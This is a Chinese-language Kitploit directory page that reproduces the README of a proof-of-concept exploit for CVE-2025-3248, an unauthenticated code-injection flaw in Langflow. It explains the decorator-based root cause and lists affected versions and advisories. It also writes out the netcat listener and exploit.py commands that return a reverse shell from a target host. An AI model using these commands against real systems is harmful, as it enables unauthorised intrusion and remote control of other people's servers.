Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3248-Langflow-RCE — 针对 CVE-2025-3248 的概念验证漏洞利用程序,这是 Langflow 中的一个未经验证的远程代码执行漏洞,演示了通过 /api/v1/validate/code 端点进行的代码注入。 | Kitploit
工具/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

针对 CVE-2025-3248 的概念验证漏洞利用程序,这是 Langflow 中的一个未经验证的远程代码执行漏洞,演示了通过 /api/v1/validate/code 端点进行的代码注入。

查看仓库
16小时24分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-3248 — Langflow 未认证远程代码执行

针对 CVE-2025-3248 的概念验证漏洞利用程序,该漏洞是 Langflow(一个 AI/LLM 工作流构建平台)中的未认证远程代码执行漏洞。

  • 受影响版本: Langflow < 1.3.0
  • 修复版本: 1.3.0
  • 漏洞类型: 未认证 RCE(CWE-94,代码注入)
  • 状态: 在被观察到被僵尸网络在野外利用后,已加入 CISA 已知被利用漏洞目录。

根本原因

Langflow 暴露了一个端点 POST /api/v1/validate/code,旨在“验证”由 UI 提交的 Python 代码片段(例如自定义组件代码)。在内部,它使用 ast.parse() / compile() 解析并编译代码,然后报告代码是否有效——无需任何认证。

问题在于:Python 会在解析/编译时评估装饰器表达式,而此时被装饰的函数尚未被调用。如果提交的“待验证代码”包含如下装饰器:

root@kitploit:~
@exec("...恶意代码...")
def test():
    pass

那么 exec(...) 调用会在代码被解析的那一刻执行——验证过程根本不需要实际调用 test()。再加上无需认证且没有沙箱隔离,一个未认证的 HTTP 请求就足以在运行 Langflow 的主机上执行任意命令。

使用方法

  1. 在您的机器上启动监听器:
    root@kitploit:~
    nc -lvnp 9001
    
  2. 针对目标运行 PoC:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. 如果目标存在漏洞,您将在监听器上获得一个 shell。
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

依赖要求

root@kitploit:~
pip install requests

免责声明

此代码仅用于教育目的和授权安全测试(实验室、CTF、获得明确书面许可的渗透测试项目)。请勿针对您不拥有或未经明确授权测试的系统运行此代码。作者不对滥用行为负责。

参考资料

  • Langflow 安全公告 GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — 任何速度都不安全:滥用 Python Exec 在 Langflow AI 中实现未认证 RCE
  • Keysight — CVE-2025-3248:Langflow 未认证代码验证
下载工具